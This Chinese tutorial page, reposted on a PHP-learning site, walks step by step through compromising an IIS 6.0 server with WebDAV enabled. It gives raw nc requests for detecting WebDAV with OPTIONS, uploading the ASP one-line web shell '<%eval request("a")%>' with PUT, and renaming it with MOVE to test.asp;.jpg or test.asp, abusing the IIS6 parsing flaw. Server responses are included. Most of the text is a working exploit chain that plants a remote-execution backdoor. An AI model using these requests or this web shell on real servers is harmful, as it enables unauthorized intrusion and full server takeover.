来源:自学PHP网 时间:2015-04-17 10:16 作者: 阅读:次
[导读] 参考:http: www 2cto com Article 201307 228165 html利用工具 nc第一步:判断nc 192 168 56 101 80OPTIONS HTTP 1 1Host: 192 168 56 101返回HTTP 1 1 200 OKDate: Tue, 03 Sep 2013 03:11:32...
|
参考: http://www.2cto.com/Article/201307/228165.html
利用工具 nc
第一步:判断
nc 192.168.56.101 80
OPTIONS / HTTP/1.1
Host: 192.168.56.101
返回
HTTP/1.1 200 OK
Date: Tue, 03 Sep 2013 03:11:32 GMT
Server: Microsoft-IIS/6.0
MS-Author-Via: DAV
Content-Length: 0
Accept-Ranges: none
DASL: <DAV:sql>
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
Cache-Control: private
当ALLOW中包含如上方法时,可以确定服务器开启了WebDAV。
第二步:
此时可以用PUT上传文件,但是不可以直接上传可执行脚本文件,可以先上传一个其他类型的文件。
PUT /test.txt HTTP/1.1
Host:192.168.56.101
Content-Length:23
<%eval request("a")%>
返回
HTTP/1.1 201 Created
Date: Tue, 03 Sep 2013 03:19:11 GMT
Server: Microsoft-IIS/6.0
Location: http://192.168.56.101/test.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK
说明test.txt创建成功了。
这步需要条件:启用了“WebDAV”扩展,并且复选了“写入”,就可以写入txt文件了
第三步:
MOVE /test.txt HTTP/1.1
Host : 192.168.56.101
Destination:http://192.168.56.101/test.asp;.jpg
需要条件:存在iis6解析漏洞
2、直接move 成test.asp
MOVE /test.txt HTTP/1.1
Host : 192.168.56.101
Destination:http://192.168.56.101/test.asp
需要条件:复选上“脚本资源访问”
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
